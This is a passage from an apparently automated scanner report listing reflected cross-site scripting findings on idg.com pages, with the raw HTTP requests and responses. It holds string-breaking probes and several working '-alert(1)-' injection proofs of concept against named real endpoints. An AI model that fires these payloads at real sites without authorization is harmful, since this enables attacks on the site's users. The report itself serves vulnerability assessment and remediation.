This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/licensingceb7b"%3b0088f227736 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5018
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/licensingceb7b";0088f227736");
} catch(err) {}</script>
...[SNIP]...

2.161. http://idg.com/www/HomeNew.nsf/docs/licensing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/licensing

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13bc5"-alert(1)-"d146ca2428f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/licensing?13bc5"-alert(1)-"d146ca2428f=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:44 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5031
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/licensing?13bc5"-alert(1)-"d146ca2428f=1");
} catch(err) {}</script>
...[SNIP]...

2.162. http://idg.com/www/HomeNew.nsf/docs/media_contacts [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/media_contacts

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df79a"%3b4f588bb5d0f was submitted in the REST URL parameter 1. This input was echoed as df79a";4f588bb5d0f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwdf79a"%3b4f588bb5d0f/HomeNew.nsf/docs/media_contacts HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:56 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5023
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwdf79a";4f588bb5d0f/HomeNew.nsf/docs/media_contacts");
} catch(err) {}</script>
...[SNIP]...

2.163. http://idg.com/www/HomeNew.nsf/docs/media_contacts [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/media_contacts

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c628"%3bee9e83583b7 was submitted in the REST URL parameter 3. This input was echoed as 4c628";ee9e83583b7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs4c628"%3bee9e83583b7/media_contacts HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:58 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5023
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs4c628";ee9e83583b7/media_contacts");
} catch(err) {}</script>
...[SNIP]...

2.164. http://idg.com/www/HomeNew.nsf/docs/media_contacts [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/media_contacts

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 822d1"%3bdea83ac2b79 was submitted in the REST URL parameter 4. This input was echoed as 822d1";dea83ac2b79 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/media_contacts822d1"%3bdea83ac2b79 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:59 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5023
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/media_contacts822d1";dea83ac2b79");
} catch(err) {}</script>
...[SNIP]...

2.165. http://idg.com/www/HomeNew.nsf/docs/media_contacts [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/media_contacts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c6f9"-alert(1)-"5d8d1380fbf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/media_contacts?6c6f9"-alert(1)-"5d8d1380fbf=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:56 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5036
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/media_contacts?6c6f9"-alert(1)-"5d8d1380fbf=1");
} catch(err) {}</script>
...[SNIP]...

2.166. http://idg.com/www/HomeNew.nsf/docs/news_service_bureaus [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/news_service_bureaus

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9811"%3b45302619bdf was submitted in the REST URL parameter 1. This input was echoed as d9811";45302619bdf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwd9811"%3b45302619bdf/HomeNew.nsf/docs/news_service_bureaus HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:00 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5029
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwd9811";45302619bdf/HomeNew.nsf/docs/news_service_bureaus");
} catch(err) {}</script>
...[SNIP]...

2.167. http://idg.com/www/HomeNew.nsf/docs/news_service_bureaus [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/news_service_bureaus

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98ce6"%3b23bcf83f2d1 was submitted in the REST URL parameter 3. This input was echoed as 98ce6";23bcf83f2d1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs98ce6"%3b23bcf83f2d1/news_service_bureaus HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:04 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5029
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs98ce6";23bcf83f2d1/news_service_bureaus");
} catch(err) {}</script>
...[SNIP]...

2.168. http://idg.com/www/HomeNew.nsf/docs/news_service_bureaus [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/news_service_bureaus

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bffb4"%3bd6c5830b776 was submitted in the REST URL parameter 4. This input was echoed as bffb4";d6c5830b776 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/news_service_bureausbffb4"%3bd6c5830b776 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:06 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5029
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/news_service_bureausbffb4";d6c5830b776");
} catch(err) {}</script>
...[SNIP]...

2.169. http://idg.com/www/HomeNew.nsf/docs/news_service_bureaus [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/news_service_bureaus

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d083c"-alert(1)-"cac8eda3971 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/news_service_bureaus?d083c"-alert(1)-"cac8eda3971=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:59 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5042
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/news_service_bureaus?d083c"-alert(1)-"cac8eda3971=1");
} catch(err) {}</script>
...[SNIP]...

2.170. http://idg.com/www/HomeNew.nsf/docs/videos [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/videos

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd6d8"%3b00f260e3c22 was submitted in the REST URL parameter 1. This input was echoed as cd6d8";00f260e3c22 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwcd6d8"%3b00f260e3c22/HomeNew.nsf/docs/videos HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:47 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5015
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwcd6d8";00f260e3c22/HomeNew.nsf/docs/videos");
} catch(err) {}</script>
...[SNIP]...

2.171. http://idg.com/www/HomeNew.nsf/docs/videos [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/videos

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1273"%3b9d5f30a9adf was submitted in the REST URL parameter 3. This input was echoed as f1273";9d5f30a9adf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docsf1273"%3b9d5f30a9adf/videos HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:48 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5015
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docsf1273";9d5f30a9adf/videos");
} catch(err) {}</script>
...[SNIP]...

2.172. http://idg.com/www/HomeNew.nsf/docs/videos [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/videos

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7a55"%3b0124ac27839 was submitted in the REST URL parameter 4. This input was echoed as e7a55";0124ac27839 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/videose7a55"%3b0124ac27839 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:48 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5015
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/videose7a55";0124ac27839");
} catch(err) {}</script>
...[SNIP]...

2.173. http://idg.com/www/HomeNew.nsf/docs/videos [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/videos

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a66c"-alert(1)-"7641fac165d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/videos?6a66c"-alert(1)-"7641fac165d=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5028
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/videos?6a66c"-alert(1)-"7641fac165d=1");
} catch(err) {}</script>
...[SNIP]...

2.174. http://idg.com/www/homenew.nsf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d243d"%3b08b5f083b38 was submitted in the REST URL parameter 1. This input was echoed as d243d";08b5f083b38 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwd243d"%3b08b5f083b38/homenew.nsf HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:15 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5003
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwd243d";08b5f083b38/homenew.nsf");
} catch(err) {}</script>
...[SNIP]...

2.175. http://idg.com/www/homenew.nsf [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c444a"-alert(1)-"ebcd302b3e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf?c444a"-alert(1)-"ebcd302b3e9=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:15 GMT
Connection: close
